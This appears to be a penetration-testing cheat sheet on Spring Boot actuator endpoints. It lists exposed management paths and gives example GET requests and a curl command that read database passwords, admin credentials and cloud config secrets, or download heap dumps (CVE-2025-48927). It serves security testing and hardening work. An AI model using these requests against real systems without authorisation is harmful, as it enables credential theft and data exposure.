Spring-Boot
Open-source Java framework used for Spring-based applications
Read this article from Wiz
Actuators
Actuators are management endpoints, those are the most important for you:
/actuator/health
and /actuator/info
are public available
/dump
or/threaddump
- Exposes data in memory./trace
or/httptrace
- Shows recentHTTP
requests./logfile
- Exposes application log files./env
or/actuator/env
- Reveals environment variables, configuration properties, and system settings./mappings
- Shows all URL mappings and endpoints./heapdump
- Downloads a heap dump file containing all objects in memory./shutdown
- Allows remote shutdown of the application/restart
- Allows remote restart of the application
SecLists
has a great wordlist: Javascript-Spring-Boot
Querying tricks
Using Property Patterns
spring.datasource.url
spring.datasource.username
spring.datasource.password
You can use these patterns in two ways:
/actuator/env/spring.datasource.password
/actuator/configprops/spring.datasource
Environment Variable
Spring Boot automatically maps environment variables to its property format following these rules:
Uppercase letters
Replace dots with underscores
Replace hyphens with underscores
Remove special characters
/actuator/env/SPRING_DATASOURCE_PASSWORD
Enumeration
Configuration Discovery with /actuator/env
Look for interesting patterns:
Database properties (
spring.datasource.*
)Security properties (
spring.security.*
)Cloud properties (
spring.cloud.*
)
GET /actuator/configprops/spring.datasource
GET /actuator/env/spring.datasource.url
GET /actuator/env/spring.datasource.username
GET /actuator/env/spring.datasource.password
GET /actuator/env/app.admin.username
GET /actuator/env/app.admin.password
"spring.cloud.config.uri"
"spring.cloud.config.username"
"spring.cloud.config.password"
Try Different content types
application/vnd.spring-boot.actuator.v3+json
application/json
CVE-2025-48927
- /heapdump
exposed - Initialization of a Resource with an Insecure Default
curl -X GET http://IP/actuator/heapdump
Use VisualVM took at the files from the dump comfortably
Last updated